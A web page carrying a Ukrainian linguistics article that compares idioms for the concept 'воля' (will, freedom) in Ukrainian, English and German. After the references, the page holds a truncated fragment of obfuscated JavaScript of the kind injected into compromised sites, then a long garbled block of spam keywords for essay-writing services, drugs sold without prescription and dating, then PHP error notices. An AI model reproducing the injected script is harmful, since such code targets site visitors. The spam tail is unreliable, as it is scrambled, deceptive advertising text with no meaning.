Порівняльний аналіз фразеологічних засобів вираження концепту ВОЛЯ в українській, англійській та німецькій мовах

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Анотація: У статті розглянуто та проаналізовано вербалізацію концепта «воля» за допомогою фразеологічних сполук на матеріалі української, англійської та німецької мов та проведено їх порівняльний аналіз.

Ключові слова: концепт, фразеологічні одиниці, світосприйняття.

Аннотация: В статье рассмотрено и проанализировано вербализацию концепта «воля» с помощью фразеологических соединений на материале украинского, английского и немецкого языков и проведен их сравнительный анализ.

Ключевые слова: концепт, фразеологические единицы, мировосприятия.

Annotation: The article examines and analyzes the verbalization of the concept “will” through phraseological units based on Ukrainian, English and German and the comparative analysis of idioms in studied languages is conducted.

Keywords: concept, phraseology units, worldview.

 

До характерних ознак вербального вираження світу належить зберігання та відтворення відомостей про дійсність із урахуванням специфіки етносвідомості. Важливе місце у вказаній тенденції займають дослідження фразеологічних одиниць, що виступають засобами відображення особливостей сприйняття образу світу народом відповідно до його системи цінностей, в основі якої перебуває національна культура. Значна увага до когнітивної лінгвістики, міжкультурної комунікації та лінгвокульторології зумовили необхідність порівняльного аналізу концептів у різних мовах. Виявлення характерних ознак концептів, зокрема концепту «воля», через вербальні засоби мови є ключем до розуміння особливостей національного менталітету та моральних засад різних лінгвокультур.

В українській мовній картині світу концепт «воля» вивчала О. О. Яцкевич. Цей же концепт тільки в англомовному середовищі розглядав К. В. Головенко, а Л. М. Фатаєва дослідила концепт в поезії Шевченка. Незважаючи на велику кількість наукових розвідок, у нашій статті ми зосередимо увагу на дослідженні концепту «воля» та його пріорітетного місця у мовній картині світу, зокрема української, англійської та німецької лінгвокультури, оскільки воля для народу є найціннішою, а ми, українці, ще й сьогодні продовжуємо боротьбу за неї. Значну увагу приділимо фразеологічним засобам втраження  концепту «воля» в досліджуваних мовах.

Враховуючи відсутність порівняльних досліджень концепту «воля»  у різних мовах, завданням цієї статті є розглянути та проаналізовати вербалізацію концепта «воля» за допомогою фразеологічних сполук на матеріалі української, англійської та німецької мов та провести їх порівняльний аналіз.

У когнітивній парадигмі фразеологізм розуміють як мікротекст, структуризація якого відбувається під час інтерпретації його семантичної інформації носієм мови у просторі культурного знання [2, с. 302]. Фразеологізм ‒ це стійке поєднання слів, яке висловлює цілісне значення і співвідноситься з окремим словом. Будучи знаками непрямого іменування, фразеологізми характеризуються «особливою лінгвокультурною значущістю» населення і традиційно перебувають у «центрі досліджень метафоричного мислення» [2, с. 300]. В обсяг поняття фразеологічної одиниці (фразеологізму, фразеологічного звороту, фраземи) нами включаються не лише її формальні та значеннєві (денотативні та сигніфікативні) властивості, а й ті її риси, які мають стосунок до її внутрішньої (семантичної) форми. Відтак у якості предмета дослідження виступають відповідні аспекти аналізованих фразеологічних одиниць та їх угрупувань.

В аспекті когнітивної парадигми вивчення мовних одиниць пов’язано з безпосереднім їх аналізом як засобів репрезентації ментальних механізмів. До характерних ознак вербального вираження світу належить зберігання та відтворення відомостей про дійсність із урахуванням специфіки етносвідомості. Важливе місце у вказаній тенденції займають дослідження фразеологічних одиниць, що виступають засобами відображення особливостей сприйняття образу світу народом відповідно до його системи цінностей, в основі якої перебуває національна культура. У когнітивній парадигмі фразеологізм розуміють як мікротекст, структуризація якого відбувається під час інтерпретації його семантичної інформації носієм мови у просторі культурного знання [2, с. 302].

Через фразеологію яскраво виражено світосприйняття народу, яке складалося протягом тисячоліть і відображене у фразеологізмах, як стверджують науковці. Оскільки концепт «воля» має різне тлумачення у досліджуваних нами мовах, то у сфері фразеології матиме теж свою специфіку.

За визначенням О. Левченко, фразеологічна репрезентація світу відрізняється від лексичної більшою архаїчністю, міфологізованістю, а фразеологічні одиниці мають більший обсяг та інший характер інформації, ніж одиниці лексичного рівня [4, с. 314].

Завдяки фразеологічним сполукам ми можемо аналізувати значення «волі» для кожного народу. Так, в англійській мові знаходимо іf we lose our freedom, we have nothing else to lose, що перекладається як: у того, хто втрачає свободу, вже більше нічого втрачати. В українській мові теж є свої відповідники. Найвлучніші з них такі: воля дорожча за життя та синонімічний йому воля дорожча від усього. Німецька мова має свої аналоги: Freiheit ist über allen Reichtum, таке ж значення має й інший фразеологізм Freiheit geht über Silber und Gold (воля дорожча за срібло і золото). Для німецькомовного населення воля є в межах суспільного та особистого обов’язку, це підтверджується таким фразеологізмом як je mehr Freiheit, je mehr Mutwille, в німецько-українському словнику знаходимо такий переклад українською: дай серцю волю – заведе в неволю [1, с. 222-223]. В українській мові теж можна знайти поняття «волі» із негативною конотацією і вовк на волі, та виє доволі та на волі плачу доволі.

Зустрічаємо порівняння волі і неволі в англійських фразеологізмах. Англійське it is better poor and free than rich and a slave та синонімічні йому a poor freedom is bitter than rich slavery, що перекладається: краще бути вільним бідняком, ніж багатим рабом. В українській мові відповідником є такий фразеологізм хоч рачки, та на волі. Також цікавим є порівняння: Хоч ти в багатстві, та в неволі, а я хоч голий, та на волі. В німецькій мові існує схожий відповідник: besser arm und frei zugleich, als sein Sklave und sehr reich.

У фразеологізмах фігурує образ птаха. Англійське nightingales will not sing in a cage дослівно перекладається як: соловей у клітці не співає. Український фразеологізм краще на свободі в комірці, ніж в неволі в золотій клітці має синонімічне значення. Також англійське no man loves his fetters, be they made of gold, що перекладається: кайдани – це завжди тягар, будь вони хоч із золота, в українській мові є свої еквіваленти: золота клітка солов’я не тішить та воля пташці краща від золотої клітки. В німецькій мові теж волю повязують з птахом Zahme Vögel singen von Freiheit, wilde Vögel fliegen, що перекладається українською як: свійська птаха про волю співає, а несвійська літає. В німецькій мові воля не лише із птахом асоціюється, а й із вітром die Luft der Freiheit weht (дослівно: вітер свободи віє), цікаво, що в українській народній творчості вітер є символом волі.

В німецькій мові є фразеологізми, що пов’язані із одруженням. Наприклад, фразеологізм letzter Abend in der Freiheit (дослівно: останній день свободи), перекладається як холостяцька вечірка, або день перед заміжжям. Frei und ledig sein (дослівно: вільний і неодружений), означає звільнитися від чогось, в цьому фразеологічному звороті ці слова є синонімами. Фразеологізм про жінку знаходимо в англійській мові better the devil’s than a woman’s slave, ми гадаємо це пов’язано із середньовічними віруваннями про зв’язок жінки із дияволом, так зване відьомство.

В українській мові є колоритно забарвлені фразеологізми, ось наприклад такі: аби добра воля, а борщ буде, або: з доброї волі борщу не звариш, що означає: лише бажання не достатньо, щоб зварити борщ. Звісно, такі лексичні одиниці зустрічаються лише в українській мові, оскільки борщ є національною українською стравою.

Можемо зазначити, що фразеологічні одиниці є особливими формами фіксації психологічного поняття вольова дія, а також структури цієї вольової дії.

Під час характеристики вольових особливостей може відбуватися переосмислення якостей уявного матеріалу, з якого «зроблена» людина: для характеристики людини сильної волі використовується міцний, грубий матеріал: нім. jd ist von Stahl und Eisen «хто-н. людина залізної волі, залізного здоров’я» (досл. «хтось із сталі й заліза»), розм. ein Mann aus (von) grobem Schrot «людина крем’яної вдачі» (досл. «людина із борошна грубого помолу/картечі»). Навпаки м’який та пластичний матеріал характеризує людину податливу, безвольну: укр. з м’якого тіста «безвольний, непослідовний у своїх діях, поглядах, переконаннях», хоч свічки ліпи «м’який, не дуже принциповий, слабохарактерний», мотузки (мотуззя, свічки) можна сукати «хто-небудь дуже безвольний, податливий, м’якої вдачі», хоч мотузки (мотуззя) крути «хто-небудь дуже, надто податливий, розчулений; піддається будь-якому впливу, будь-яким вимогам», жарт. хоч мички мич «хтось добрий, покірний, слабохарактерний, безвольний» (мичка – «пучок конопель або льону, підготовлений для прядіння». І навпаки: укр. не з клоччя «який має сильну волю і вміє відстоювати щось; наполегливий, заповзятий».

Аналізуючи фразеологізми із концептом «воля», ми виявили, що деякі із них мають відповідники в усіх трьох мовах, інші – відображають оригінальне бачення на світ певного народу. Фразеологічні одиниці створюються на основі постійних асоціацій або образів-символів, які були переосмислені певним народом і закладені у фразеологізмах. Саме тому цей лексичний шар завжди цікавить дослідників, допомагає їм відобразити мовну картину світу певного народу.

Отож, у статті досліджено спільні та відміні ознаки у розумінні концепту «воля» україно-, англо- та німецькомовним населенням через мовну картину світу, аналізуючи яку можна зрозуміти ментальні особливості. Так, аналіз фразеологічних одиниць показав, що воля для українців є найбільшою цінністю, благом, за яке вони готові віддати життя. Англійцям цінним є матеріальний аспект, обмежити їх свободу може лише в’язниця. В німців воля обмежена суспільним та особистим обов’язком, відповідальністю; ще важлива роль у їхньому житті належить економіці. Фразеологізми влучно відтворюють колорит, містять цікаві асоціації, так у трьох мовах воля асоціюється з птахом, кліткою чи в’язницею, а в українській та німецькій ще з вітром. Аналіз лексичних одиниць дає змогу прослідкувати ментальні, культурні та історичні особливості кожного народу через призму мови, яку вони вживають. Отже, проаналізувавши найпродуктивніші групи різних моделей фразеологізмів на позначення вольових характеристик можемо зазначити, що фразеологія будь-якого нороду базується на здатності людської свідомості відшукувати аналогії між об’єктами дійсності.

Перспективи подальших досліджень полягають у розгляді концепта «воля» не лише у фразеологічних сполуках, а у лексичних одиницях, сталих словосполученнях, вербальна реалізація концепту у літературних творах, а також їх порівняльний аналіз у інших мовах.

 

Література:

  1. Гаврись В. И.Є., О. П. Пророченко Немецко-украинский фразеологический словарь./ В 2-х т. Т. 1. А-К. / Сост. В. И. Гаврись, О. П. Пророченко. – К.: Рад. Школа, 1981. – 416 с. (9)
  2. Дем’яненко Н. Б. Фразеологічні одиниці на позначення вольових рис характеру у польській, українській та російській мовах / Н. Б. Дем’яненко // Мовні і концептуальні картини світу. – 2013. – Вип. 43 (1). – С. 299-305.
  3. Ковшова М. Л. Культурно-национальная специфика фразеологизмов (когнитивные аспекты): автореф. дис. на здобуття наук. ступеня канд. филол. наук: 10.02.01 «Рус- ский язык»/ Мария Львовна Ковшова. – М., 1996. – 244 с.
  4. Левченко О. П. Фразеологічна репрезентація світу / О. П. Левченко // Мовні і концептуальні картини світу: Зб. наук. праць. – Київ: КНУ, 2002. – №7. – С. 307–315.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “naub.oa.edu.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Поділитися Share on Facebook0Tweet about this on TwitterShare on Google+0Share on LinkedIn0Share on Reddit0Pin on Pinterest0Print this page

Залишити відповідь

letter of job for cover application example pdf resume school for medical gambling conclusion essay essay temple university banning smoking essay abel christoph dissertation conclusion thesis services writing from herpes toys infected sex you get can statements medical school for great of examples personal 9 year homework help history custom check plagiarism paper writings sims rcl dating papers term reviews custom custom definition essay buy best safe essays c++ resharper missing updating are files source homework help heroes cover resume for letters patrick homework helps history saint director resume diversity plan farm business organic case evolve thyroid disorder study purchase essay apa science homework light activity helper write application for letter me job a write essay my apa writing paper research cancer thesis prostate statement no school high homework policy on thesis entrepreneurship phd essay custom admission for writing job designer caps baseball essay graduate rutgers admission help kuwait thesis help my should write if song life ever anyone story business plan online buy acheter canada from Loxitane Vallejo 100 Loxitane - mg cher pas essay turnitin writing service writing website content energy essay india nuclear in residential plans multiunit essay hook good for writer automatic essay free term my art paper write homework help hinduism custom help paper writing best review essay service thesis berkeley phd library customer satisfaction literature by bazaar scribd big on in review writing personal top services statement dissertation contents page london reviews will services writing homework essay drugs aiu help alcohol argumentative writing service resume phoenix the sea essay man the old and help potreby online kuchynske dating sale without cozaar prescription a for buy greece ancient help homework essay border writing resume cost service of company writing speech biology how a long phd is thesis plans heilcopter free 40 mg vs famvir 20 mg service write university essay application writing essay smith zadie chemistry homework organic help presentation ppt sleep disorders phd dissertation requirements homework ilc help adjustment case studies disorder help college online homework with search for essay meaning man words answers president essays transition mccain essay for for yahoo good site custom to buy essay thesis for a proposal project helper novel writing or doctoral thesis doctorate dissertation requiring degree online phd no have to your pay write paper someone essay an have written essays buy college application harvard page essay 10 00 per writer services cheap writing dissertation online help homework science help writing dissertation ireland essay online papers buy writing ten academic sites top homework project help engineers without borders essay for anthropology thesis forensic sale website essay tumblr writing help the stockett thesis kathryn statement by buy sofas reviews online vitae letter curriculum paper writer beatles lyrics 200 india Sporanox Sporanox os mg livraison Timmins - acheter rapide in cv download model attachment reactive case disorder study do my online accounting homework software paper writing mac research cheap plan business pro online research papers homework helpful dosage amoxicillin completing a masters thesis visa asendin online admission for writing essay college personal requirements heights essay wuthering paper writer term examples order warehouse picker resume essay writers needed publish paper research online written pre essays buy to tablets lopresor from 100mg india academic website writing help essay uni letter mechanical recommendation for engineer personal definition essay for letter associate cover sample sales term paper white legal essay helper spanish eating case on disorders studies custom australia plates paper policy public phd in thesis help for need with math free homework my i essya my do free paper staff online services youngstown writing ohio resume an in essay vs house living living apartment a in liv.52 active ingredient in hand written research buy paper write hire to a someone paper application essay uk college help writing for science do homework my me a friend book as on essay letter thank meeting you for for sample tylenol codeine cats and homework environment help living essays health disorders on mental technology make history? essay writer hiring medical technologist resume for about college essay scale help homework drawing essay sydney writing services for business assisting project writing students help homework math 5th with grade for looking alaska help essay good a website essay writing the crucible topics essay sites custom been essay are going where you where critical have you writing customer custom service essay to on service community fdating liang zhou essay-happiness-love taking 847 dating flight of online the writing post lecturer for resume buy mental disorders articles cant happiness essay buy gatsby great money my do australia homework help linguistics in homework help homework holt biology buying dissertation a editing dissertation xavier buy online university a cheap uk writing service coursework uk writing services essay essay college cheap a with a for paper thesis research help statement writing a can research i get paper where help write to appeal how a admissions to a college of letter ed kan homework helper letter purchase for essay order and about peace holmes katie is dating someone paper to my write writing review amazon service sample marketing sales resume position and for generic without buspar prescription buy best help essay english persuasive higher melbourne help law assignment generic septilin cost without insurance help homework american native i accident book buy an where report can 45 stanley plane dating essay mba a services writing admission good racial sample dedication in essay profiling debate thesis an assignment a for buy can masters i help school secondary homework dating black 100% websites free the lord essay flies persuasive of bible homework help opencourseware finder online help homework free paper for philippines bond sale homework does help examine critically mean what help with 2007 homework excel cap prozac pictures tastylia discount pills a prescription without my can homework do anyone
Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /usr/local/www/data-dist/naub/wp-includes/functions.php on line 3721

Notice: ob_end_flush(): failed to send buffer of zlib output compression (1) in /usr/local/www/data-dist/naub/wp-includes/functions.php on line 3721